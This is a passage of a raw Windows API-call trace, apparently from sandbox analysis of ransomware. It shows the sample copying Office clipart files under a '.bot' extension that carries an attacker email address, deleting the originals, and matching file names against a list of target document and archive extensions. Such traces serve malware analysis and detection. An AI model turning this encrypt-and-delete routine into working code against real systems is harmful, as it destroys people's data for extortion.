	[0154.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101856.bmp.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0154.910] GetLastError () returned 0x0
	[0154.910] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x133f8, lpOverlapped=0x0) returned 1
	[0154.948] WriteFile (in: hFile=0x3cc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x13400, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x13400, lpOverlapped=0x0) returned 1
	[0154.950] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.950] WriteFile (in: hFile=0x3cc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.951] SetEndOfFile (hFile=0x3cc) returned 1
	[0155.473] CloseHandle (hObject=0x3cc) returned 1
	[0155.473] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.473] SetEndOfFile (hFile=0x3a0) returned 1
	[0155.476] CloseHandle (hObject=0x3a0) returned 1
	[0155.476] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.745] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101856.bmp")) returned 1
	[0155.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 63
	[0155.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 63
	[0155.757] lstrlenW (lpString=".doc") returned 4
	[0155.757] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0155.757] lstrlenW (lpString=".docx") returned 5
	[0155.757] lstrcmpiW (lpString1=".docx", lpString2="6.BMP") returned -1
	[0155.757] lstrlenW (lpString=".pdf") returned 4
	[0155.757] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0155.757] lstrlenW (lpString=".xls") returned 4
	[0155.757] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0155.757] lstrlenW (lpString=".xlsx") returned 5
	[0155.757] lstrcmpiW (lpString1=".xlsx", lpString2="6.BMP") returned -1
	[0155.757] lstrlenW (lpString=".ppt") returned 4
	[0155.757] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0155.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 63
	[0155.757] lstrlenW (lpString=".zip") returned 4
	[0155.757] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0155.757] lstrlenW (lpString=".rar") returned 4
	[0155.757] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0155.757] lstrlenW (lpString=".bz2") returned 4
	[0155.757] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0155.757] lstrlenW (lpString=".7z") returned 3
	[0155.757] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0155.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 63
	[0155.757] lstrlenW (lpString=".dbf") returned 4
	[0155.757] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0155.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 63
	[0155.758] lstrlenW (lpString=".1cd") returned 4
	[0155.758] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0155.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 63
	[0155.758] lstrlenW (lpString=".jpg") returned 4
	[0155.758] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0155.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 63
	[0155.758] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 63
	[0155.758] lstrlenW (lpString=".doc") returned 4
	[0155.758] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0155.758] lstrlenW (lpString=".docx") returned 5
	[0155.758] lstrcmpiW (lpString1=".docx", lpString2="6.BMP") returned -1
	[0155.758] lstrlenW (lpString=".pdf") returned 4
	[0155.758] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0155.758] lstrlenW (lpString=".xls") returned 4
	[0155.758] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0155.759] lstrlenW (lpString=".xlsx") returned 5
	[0155.759] lstrcmpiW (lpString1=".xlsx", lpString2="6.BMP") returned -1
	[0155.759] lstrlenW (lpString=".ppt") returned 4
	[0155.759] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0155.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 63
	[0155.759] lstrlenW (lpString=".zip") returned 4
	[0155.759] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0155.759] lstrlenW (lpString=".rar") returned 4
	[0155.759] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0155.759] lstrlenW (lpString=".bz2") returned 4
	[0155.759] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0155.759] lstrlenW (lpString=".7z") returned 3
	[0155.759] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0155.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 63
	[0155.759] lstrlenW (lpString=".dbf") returned 4
	[0155.759] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0155.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 63
	[0155.759] lstrlenW (lpString=".1cd") returned 4
	[0155.759] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0155.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 63
	[0155.759] lstrlenW (lpString=".jpg") returned 4
	[0155.759] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0155.759] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0155.759] lstrlenW (lpString="J0101980.WMF") returned 12
	[0155.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101980.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0155.834] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=16104) returned 1
	[0155.834] CloseHandle (hObject=0x3ac) returned 1
	[0155.834] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101980.wmf")) returned 0x20
	[0155.834] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101980.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101980.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0155.834] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.834] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101980.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0155.835] GetLastError () returned 0x0
	[0155.835] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3ee8, lpOverlapped=0x0) returned 1
	[0155.848] WriteFile (in: hFile=0x39c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3ef0, lpOverlapped=0x0) returned 1
	[0155.849] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.849] WriteFile (in: hFile=0x39c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.850] SetEndOfFile (hFile=0x39c) returned 1
	[0155.850] CloseHandle (hObject=0x39c) returned 1
	[0155.850] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.850] SetEndOfFile (hFile=0x3ac) returned 1
	[0155.852] CloseHandle (hObject=0x3ac) returned 1
	[0155.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.878] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101980.wmf")) returned 1
	[0155.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 63
	[0155.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 63
	[0155.879] lstrlenW (lpString=".doc") returned 4
	[0155.879] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.879] lstrlenW (lpString=".docx") returned 5
	[0155.879] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0155.879] lstrlenW (lpString=".pdf") returned 4
	[0155.879] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.879] lstrlenW (lpString=".xls") returned 4
	[0155.879] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.879] lstrlenW (lpString=".xlsx") returned 5
	[0155.879] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0155.879] lstrlenW (lpString=".ppt") returned 4
	[0155.879] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 63
	[0155.880] lstrlenW (lpString=".zip") returned 4
	[0155.880] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.880] lstrlenW (lpString=".rar") returned 4
	[0155.880] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.880] lstrlenW (lpString=".bz2") returned 4
	[0155.880] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.880] lstrlenW (lpString=".7z") returned 3
	[0155.880] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 63
	[0155.880] lstrlenW (lpString=".dbf") returned 4
	[0155.880] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 63
	[0155.880] lstrlenW (lpString=".1cd") returned 4
	[0155.880] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 63
	[0155.880] lstrlenW (lpString=".jpg") returned 4
	[0155.880] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 63
	[0155.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 63
	[0155.880] lstrlenW (lpString=".doc") returned 4
	[0155.880] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.880] lstrlenW (lpString=".docx") returned 5
	[0155.880] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0155.880] lstrlenW (lpString=".pdf") returned 4
	[0155.880] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.880] lstrlenW (lpString=".xls") returned 4
	[0155.880] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.880] lstrlenW (lpString=".xlsx") returned 5
	[0155.880] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0155.880] lstrlenW (lpString=".ppt") returned 4
	[0155.881] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 63
	[0155.881] lstrlenW (lpString=".zip") returned 4
	[0155.881] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.881] lstrlenW (lpString=".rar") returned 4
	[0155.881] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.881] lstrlenW (lpString=".bz2") returned 4
	[0155.881] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.881] lstrlenW (lpString=".7z") returned 3
	[0155.881] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 63
	[0155.881] lstrlenW (lpString=".dbf") returned 4
	[0155.881] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 63
	[0155.881] lstrlenW (lpString=".1cd") returned 4
	[0155.881] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 63
	[0155.881] lstrlenW (lpString=".jpg") returned 4
	[0155.881] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.881] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0155.881] lstrlenW (lpString="J0103262.WMF") returned 12
	[0155.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103262.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0155.882] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=12900) returned 1
	[0155.882] CloseHandle (hObject=0x3b0) returned 1
	[0155.882] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103262.wmf")) returned 0x20
	[0155.882] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103262.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103262.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0155.885] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.885] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103262.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0155.886] GetLastError () returned 0x0
	[0155.886] ReadFile (in: hFile=0x3b0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3264, lpOverlapped=0x0) returned 1
	[0155.905] WriteFile (in: hFile=0x268, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3270, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3270, lpOverlapped=0x0) returned 1
	[0155.906] ReadFile (in: hFile=0x3b0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.906] WriteFile (in: hFile=0x268, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.906] SetEndOfFile (hFile=0x268) returned 1
	[0155.906] CloseHandle (hObject=0x268) returned 1
	[0155.906] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.906] SetEndOfFile (hFile=0x3b0) returned 1
	[0155.908] CloseHandle (hObject=0x3b0) returned 1
	[0155.909] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.931] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103262.wmf")) returned 1
	[0155.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 63
	[0155.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 63
	[0155.967] lstrlenW (lpString=".doc") returned 4
	[0155.967] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.967] lstrlenW (lpString=".docx") returned 5
	[0155.967] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0155.967] lstrlenW (lpString=".pdf") returned 4
	[0155.967] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.967] lstrlenW (lpString=".xls") returned 4
	[0155.967] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.967] lstrlenW (lpString=".xlsx") returned 5
	[0155.967] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0155.967] lstrlenW (lpString=".ppt") returned 4
	[0155.967] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 63
	[0155.967] lstrlenW (lpString=".zip") returned 4
	[0155.968] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.968] lstrlenW (lpString=".rar") returned 4
	[0155.968] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.968] lstrlenW (lpString=".bz2") returned 4
	[0155.968] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.968] lstrlenW (lpString=".7z") returned 3
	[0155.968] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 63
	[0155.968] lstrlenW (lpString=".dbf") returned 4
	[0155.968] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 63
	[0155.968] lstrlenW (lpString=".1cd") returned 4
	[0155.968] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 63
	[0155.968] lstrlenW (lpString=".jpg") returned 4
	[0155.968] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 63
	[0155.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 63
	[0155.968] lstrlenW (lpString=".doc") returned 4
	[0155.968] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.968] lstrlenW (lpString=".docx") returned 5
	[0155.968] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0155.968] lstrlenW (lpString=".pdf") returned 4
	[0155.968] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.968] lstrlenW (lpString=".xls") returned 4
	[0155.968] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.968] lstrlenW (lpString=".xlsx") returned 5
	[0155.968] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0155.968] lstrlenW (lpString=".ppt") returned 4
	[0155.968] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 63
	[0155.969] lstrlenW (lpString=".zip") returned 4
	[0155.969] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.969] lstrlenW (lpString=".rar") returned 4
	[0155.969] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.969] lstrlenW (lpString=".bz2") returned 4
	[0155.969] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.969] lstrlenW (lpString=".7z") returned 3
	[0155.969] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 63
	[0155.969] lstrlenW (lpString=".dbf") returned 4
	[0155.969] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 63
	[0155.969] lstrlenW (lpString=".1cd") returned 4
	[0155.969] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF") returned 63
	[0155.969] lstrlenW (lpString=".jpg") returned 4
	[0155.969] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.969] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0155.969] lstrlenW (lpString="J0105230.WMF") returned 12
	[0155.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105230.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0155.970] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=5172) returned 1
	[0155.970] CloseHandle (hObject=0x268) returned 1
	[0155.970] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105230.wmf")) returned 0x20
	[0155.970] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105230.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105230.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0155.970] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.970] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105230.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
